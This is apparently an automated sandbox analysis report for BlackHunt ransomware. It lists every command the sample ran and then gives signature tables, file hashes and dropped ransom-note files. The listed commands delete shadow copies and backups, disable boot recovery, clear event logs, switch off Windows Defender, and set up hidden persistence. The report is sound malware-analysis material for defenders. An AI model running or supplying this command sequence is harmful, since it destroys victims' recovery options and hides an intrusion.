C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D F:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D M:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Application
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\taskkill.exe
taskkill /IM mshta.exe /f
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Setup
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security /e:false
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\notepad.exe
notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\ProgramData\#BlackHunt_Private.key
| MD5 | 868458415e80d77143a5d7deed140fef |
| SHA1 | bd873b33c1ea3ef1c8fcaba583fd42e6bf0c6cb2 |
| SHA256 | 6f49a210dd80cdd7b9ddba7b078a4b2c7b3b40dbf6f75ec7048688d2e3124724 |
| SHA512 | 903b8d5eddf8fc6aaf7f2d163114c54c9b86fb957150abfb3beca44eef23dadc63990afa592b3f092f0235315c663c6e651a9800d7ff79e74699f7ab48dc50eb |
C:\ProgramData\#BlackHunt_ReadMe.hta
| MD5 | e309e86aa475bf9ab6d9ec368d40fe5a |
| SHA1 | 3db62b6572867604cd091a6c518c4458308d002e |
| SHA256 | 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2 |
| SHA512 | 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583 |
C:\ProgramData\#BlackHunt_ReadMe.txt
| MD5 | 88d5b995bf93732281a24ffa8c40ab5c |
| SHA1 | ed0d8cb268e450141673338e131ff2bd97f8b23c |
| SHA256 | 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1 |
| SHA512 | ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 00:48
Reported
2024-11-06 00:50
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Deletes NTFS Change Journal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Clears Windows event logs
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (3360) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables Task Manager via registry modification
Disables use of System Restore points
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | C:\Windows\system32\reg.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\security\java.security | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\he-il\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\css\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\it-it\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_listview_18.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
